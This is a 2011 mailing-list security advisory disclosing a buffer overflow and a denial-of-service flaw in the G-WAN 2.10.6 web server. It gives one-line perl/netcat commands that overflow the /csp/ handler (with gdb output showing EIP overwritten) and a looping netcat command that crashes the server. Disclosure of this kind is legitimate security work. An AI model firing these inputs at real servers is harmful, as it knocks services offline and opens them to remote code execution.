mailing list archives
Multiple G-WAN vulnerabilities
From: Fredrik Widlund <fredrik.widlund () gmail com>
Date: Thu, 13 Oct 2011 17:01:58 +0200
Title: Multiple G-WAN vulnerabilities
Product: G-WAN (http://gwan.com/)
Author: Fredrik Widlund
E-mail: fredrik.widlund (at) gmail (dot) com
"G-WAN is much smaller, faster and safer than the next best:
- Web servers,
- Web applications servers,
- Web acceleration servers,
- KV stores & noSQL databases." (from gwan.com)
Problems exist with design issues, parsing, signal handling, and
A) A buffer overflow issue exists in the routine handling URL encoding
for the "csp" (so called G-WAN servlets) sub-directory. Exploiting the
vulnerability results in remotely being able to execute shellcode on
B) SIGPIPE signals were not handled correctly. Exploiting the
vulnerability resulted in denial of service.
C) Several minor issues.
The vulnerabilities were discovered and successfully exploited on an
Arch Linux 64-bit system running a Linux 3.0.6 kernel with ASLR
perl -e "print 'GET /csp/','A'x1200,\" HTTP/1.0\r\n\r\n\"" | nc localhost 80
G-WAN 2.10.6 (pid:9167)
[New LWP 9169]
Program received signal SIGSEGV, Segmentation fault.
[Switching to LWP 9169]
0x41414141 in ?? ()
(gdb) i r
eax 0x31 49
ecx 0x81f2298 136258200
edx 0x0 0
ebx 0x41414141 1094795585
esp 0xf7da51f0 0xf7da51f0
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141
eflags 0x10202 [ IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
A proof of concept exploit was created brute forcing the ASLR stack
offset which leads to a vulnerable system being compromised remotely
in less than 5 minutes, sending a request each second at the most to
avoid the G-WAN watchdog giving up.
The routines for parsing HTTP 0.9 were broken resulting in a
infinitely looping reply. Repeatedly interrupting such loops will
quickly result in denial of service.
while :; do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n" | timeout 0.01 nc localhost 80 ; done
G-WAN 2.10.6 (pid:3948)
[New LWP 3951]
Program received signal SIGPIPE, Broken pipe.
[Switching to LWP 3951]
0xf7ffd430 in __kernel_vsyscall ()
4. AFFECTED VERSIONS
G-WAN 2.10.6 (October 6, 2011).
There is no archive of older versions available and the vendor refuses
to cooperate or acknowledge the issues.
The issues seems to be resolved. Upgrade to the latest version.
fredrik.widlund (at) gmail (dot) com
- Multiple G-WAN vulnerabilities Fredrik Widlund (Oct 13)